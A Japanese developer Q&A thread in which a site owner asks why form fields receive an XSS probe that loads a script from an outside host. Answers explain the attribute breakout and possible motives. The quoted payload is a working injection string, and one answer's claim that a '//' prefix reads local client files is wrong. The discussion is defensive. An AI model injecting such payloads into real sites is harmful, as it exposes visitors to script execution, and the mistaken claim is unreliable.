私が運営する稚拙なサイトですが、最近フォームにスクリプトを入れてくる攻撃にあっています。
エスケープはしているのでそれ自体は問題無いと思うのですが意図がわからず怖いです。
具体的には名前欄や住所欄に
"><script src=//xss.re/692></script>
知識が少ないので良くわからないのですが、これは何を意図してこんな事して来ているのででしょうか?
よろしくお願いします。
気になる質問をクリップする
クリップした質問は、後からいつでもMYページで確認できます。
またクリップした質問に回答があった際、通知やメールを受け取ることができます。
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
回答3件
0
ベストアンサー
XSSが仕込めるとわかれば、閲覧者のブラウザをDDoS攻撃のスレーブにすることもできますから、そのサイトの情報自体が目当てでなくとXSS攻撃する価値はあります。そうすると、何か投稿できそうなサイトは片っ端から「とりあえずドアノブを回してみる」やつが出てくるわけです。
投稿2017/05/12 01:59
総合スコア5568
0
Script tag loading “xss.re/692” in e-commerce transaction data - real attack or something else?みたいですね。
日本語翻訳で見ると、アクセスしてきた人の情報を収集するものみたいです。
投稿2017/05/12 01:53
総合スコア1305
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2017/05/12 03:15
0
"><script src=//xss.re/692></script>
このHTMLをブラウザで表示すると
"><script src=//xss.re/692></script
こうなります。
<input type="text" value"">
このテキストボックスに先ほどのデータを入力すると、
<input type="text" value""><script src=//xss.re/692></script">
となってスクリプトを埋め込めます。
//xss.re/692
これは自前のスクリプトなんですかね
//から入力するとクライアントのローカルファイルにアクセスするので、その可能性があります。
投稿2017/05/12 02:33
総合スコア868
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2017/05/12 02:37
2017/05/12 02:48
2017/05/12 06:14
2017/05/12 06:18 編集
2017/05/12 09:45
あなたの回答
tips
太字
斜体
打ち消し線
見出し
引用テキストの挿入
コードの挿入
リンクの挿入
リストの挿入
番号リストの挿入
表の挿入
水平線の挿入
プレビュー
質問の解決につながる回答をしましょう。 サンプルコードなど、より具体的な説明があると質問者の理解の助けになります。 また、読む側のことを考えた、分かりやすい文章を心がけましょう。
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2017/05/12 02:38
2017/05/12 11:16
2017/05/12 11:32